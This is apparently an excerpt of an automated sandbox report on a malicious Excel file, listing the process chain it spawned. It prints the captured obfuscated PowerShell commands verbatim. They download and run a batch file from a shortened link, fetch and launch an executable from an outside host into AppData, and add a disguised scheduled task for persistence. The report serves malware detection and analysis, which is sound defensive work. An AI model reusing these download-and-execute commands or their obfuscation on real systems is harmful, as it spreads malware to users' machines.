        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\sb.exe 'C:\Users\user\AppData\Roaming\sb.exe'
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess created: C:\Users\user\AppData\Roaming\sb.exe {path}
        Source: C:\Users\user\AppData\Roaming\sb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2109986432.0000000002320000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2130280252.0000000002A30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2107326515.0000000002A70000.00000002.00000001.sdmp

        Data Obfuscation:

        barindex
        Obfuscated command line foundShow sources
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'
        Suspicious powershell command line foundShow sources
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_00682156 push ecx; ret
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_006B08FC push eax; ret
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_006B099C push ecx; ret
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0068118E push ecx; ret
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0042BBAE push eax; ret

        Persistence and Installation Behavior:

        barindex
        Tries to download and execute files (via powershell)Show sources
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\sb.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\sb.exeFile created: C:\Users\user\AppData\Roaming\axoikBEWgDCn.exeJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
